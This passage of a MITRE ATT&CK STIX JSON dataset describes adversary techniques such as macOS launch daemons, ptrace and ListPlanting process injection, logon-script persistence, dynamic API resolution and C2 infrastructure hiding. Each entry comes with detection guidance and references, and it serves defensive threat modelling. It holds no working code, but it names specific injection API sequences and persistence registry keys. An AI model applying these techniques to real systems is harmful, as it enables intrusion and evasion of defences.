"mitre-attack", "url": "https://attack.mitre.org/techniques/T1084", "external_id": "T1084"}, {"source_name": "Dell WMI Persistence", "description": "Dell SecureWorks Counter Threat Unit\u2122 (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.", "url": "https://www.secureworks.com/blog/wmi-persistence"}, {"source_name": "Kazanciyan 2014", "description": "Kazanciyan, R. & Hastings, M. (2014). Defcon 22 Presentation. Investigating PowerShell Attacks [slides]. Retrieved November 3, 2014.", "url": "https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf"}, {"source_name": "Mandiant M-Trends 2015", "description": "Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.", "url": "https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}, {"source_name": "Medium Detecting WMI Persistence", "description": "French, D. (2018, October 9). Detecting & Removing an Attacker\u2019s WMI Persistence. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Launch Daemon", "description": "Per Apple\u2019s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\n \nAdversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.\n \nThe plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon\u2019s executable and gain persistence or Privilege Escalation.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See's Knock Knock application.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["root"], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e99ec083-abdd-48de-ad87-4dbf6f8ba2a4", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1160", "external_id": "T1160"}, {"source_name": "AppleDocs Launch Agent Daemons", "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "OSX Malware Detection", "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf"}, {"source_name": "WireLurker", "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Ptrace System Calls", "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes\u2019 memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", "created": "2020-01-14T01:33:19.065Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/008", "external_id": "T1055.008"}, {"source_name": "PTRACE man", "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.", "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html"}, {"source_name": "Medium Ptrace JUL 2018", "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.", "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be"}, {"source_name": "BH Linux Inject", "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.", "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf"}, {"source_name": "ArtOfMemoryForensics", "description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017."}, {"source_name": "GNU Acct", "description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.", "url": "https://www.gnu.org/software/acct/"}, {"source_name": "RHEL auditd", "description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"}, {"source_name": "Chokepoint preload rootkits", "description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.", "url": "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-30T21:28:45.038Z", "name": "Power Settings", "description": "Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)\n\nAdversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation: systemdsleep Linux)\n\nFor example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.(Citation: Two New Monero Malware Attacks Target Windows and Android Users) Adversaries may also extend system lock screen timeout settings.(Citation: BATLOADER: The Evasive Downloader Malware) Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.(Citation: CoinLoader: A Sophisticated Malware Loader Campaign)\n\nAware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Goldstein Menachem", "Juan Tapiador"], "x_mitre_deprecated": false, "x_mitre_detection": "Command-line invocation of tools capable of modifying services may be unusual and can be monitored for and alerted on, depending on how systems are typically used in a particular environment. \n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS", "Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "created": "2023-06-05T15:52:52.467Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1653", "external_id": "T1653"}, {"source_name": "Sleep, shut down, hibernate", "description": "AVG. (n.d.). Should You Shut Down, Sleep or Hibernate Your PC or Mac Laptop?. Retrieved June 8, 2023.", "url": "https://www.avg.com/en/signal/should-you-shut-down-sleep-or-hibernate-your-pc-or-mac-laptop"}, {"source_name": "CoinLoader: A Sophisticated Malware Loader Campaign", "description": "Avira. (2019, November 28). CoinLoader: A Sophisticated Malware Loader Campaign. Retrieved June 5, 2023.", "url": "https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign"}, {"source_name": "BATLOADER: The Evasive Downloader Malware", "description": "Bethany Hardin, Lavine Oluoch, Tatiana Vollbrecht. (2022, November 14). BATLOADER: The Evasive Downloader Malware. Retrieved June 5, 2023.", "url": "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html"}, {"source_name": "Two New Monero Malware Attacks Target Windows and Android Users", "description": "Douglas Bonderud. (2018, September 17). Two New Monero Malware Attacks Target Windows and Android Users. Retrieved June 5, 2023.", "url": "https://securityintelligence.com/news/two-new-monero-malware-attacks-target-windows-and-android-users/"}, {"source_name": "Condi-Botnet-binaries", "description": "Joie Salvio and Roy Tay. (2023, June 20). Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389. Retrieved September 5, 2023.", "url": "https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389"}, {"source_name": "systemdsleep Linux", "description": "Man7. (n.d.). systemd-sleep.conf(5) \u2014 Linux manual page. Retrieved June 7, 2023.", "url": "https://man7.org/linux/man-pages/man5/systemd-sleep.conf.5.html"}, {"source_name": "Microsoft: Powercfg command-line options", "description": "Microsoft. (2021, December 15). Powercfg command-line options. Retrieved June 5, 2023.", "url": "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options?adlt=strict"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-29T14:04:50.569Z", "name": "Network Connection Enumeration", "description": "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Command: Command Execution", "Process: Process Creation", "Script: Script Execution", "Process: OS API Execution"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0840", "external_id": "T0840"}, {"source_name": "MITRE", "description": "MITRE System Network Connections Discovery Retrieved. 2018/05/31 ", "url": "https://attack.mitre.org/wiki/Technique/T1049"}, {"source_name": "Netstat", "description": "Wikipedia. (n.d.). Netstat. Retrieved May 23, 2022.", "url": "https://en.wikipedia.org/wiki/Netstat"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Dynamic API Resolution", "description": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.\n\nAPI functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)\n\nTo avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.\n\nVarious methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", "created": "2022-08-22T20:42:08.498Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/007", "external_id": "T1027.007"}, {"source_name": "Huntress API Hash", "description": "Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.", "url": "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection"}, {"source_name": "BlackHat API Packers", "description": "Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.", "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf"}, {"source_name": "Drakonia HInvoke", "description": "drakonia. (2022, August 10). HInvoke and avoiding PInvoke. Retrieved August 22, 2022.", "url": "https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03"}, {"source_name": "IRED API Hashing", "description": "spotheplanet. (n.d.). Windows API Hashing in Malware. Retrieved August 22, 2022.", "url": "https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:13.327Z", "name": "Lateral Tool Transfer", "description": "Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK)\n\nIn control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Share: Network Share Access", "File: File Metadata", "File: File Creation", "Network Traffic: Network Traffic Content", "Command: Command Execution", "Process: Process Creation", "Network Traffic: Network Traffic Flow"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0867", "external_id": "T0867"}, {"source_name": "Enterprise ATT&CK", "description": "Enterprise ATT&CK Enterprise ATT&CK Lateral Tool Transfer Retrieved. 2019/10/27 Lateral Tool Transfer Retrieved. 2019/10/27 ", "url": "https://attack.mitre.org/techniques/T1570/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-08-07T14:23:30.265Z", "name": "Remote Desktop Protocol", "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Matthew Demaske, Adaptforward"], "x_mitre_deprecated": false, "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["RDP service enabled, account in the Remote Desktop Users group"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "created": "2020-02-11T18:23:26.059Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1021/001", "external_id": "T1021.001"}, {"source_name": "Alperovitch Malware", "description": "Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.", "url": "http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/"}, {"source_name": "TechNet Remote Desktop Services", "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.", "url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Logon Script (Windows)", "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", "created": "2020-01-10T03:43:37.211Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1037/001", "external_id": "T1037.001"}, {"source_name": "TechNet Logon Scripts", "description": "Microsoft. (2005, January 21). Creating logon scripts. Retrieved April 27, 2016.", "url": "https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx"}, {"source_name": "Hexacorn Logon Scripts", "description": "Hexacorn. (2014, November 14). Beyond good ol\u2019 Run key, Part 18. Retrieved November 15, 2019.", "url": "http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "ListPlanting", "description": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.\n\nList-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.\n\nListPlanting (a form of message-passing \"shatter attack\") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process\u2019 memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.\n\nSome variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) \n\nFinally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["ESET"], "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as FindWindow, FindWindowEx, EnumWindows, EnumChildWindows, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be abused for this technique. \n\nConsider monitoring for excessive use of SendMessage and/or PostMessage API functions with LVM_SETITEMPOSITION and/or LVM_GETITEMPOSITION arguments.\n\nAnalyze process behavior to determine if a process is performing unusual actions, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", "created": "2021-11-22T15:02:15.190Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/015", "external_id": "T1055.015"}, {"source_name": "Microsoft List View Controls", "description": "Microsoft. (2021, May 25). About List-View Controls. Retrieved January 4, 2022.", "url": "https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview"}, {"source_name": "Modexp Windows Process Injection", "description": "odzhan. (2019, April 25). Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline. Retrieved November 15, 2021.", "url": "https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/"}, {"source_name": "ESET InvisiMole June 2020", "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-18T19:44:00.603Z", "name": "Hide Infrastructure", "description": "Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.\n\nC2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies)\n\nAdversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite)\n\nHiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Matt Mullins", "Eliav Livneh", "Hen Porcilan", "Diyar Saadi Ali"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux", "Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", "created": "2024-02-13T17:00:00.175Z", "created_by_ref": 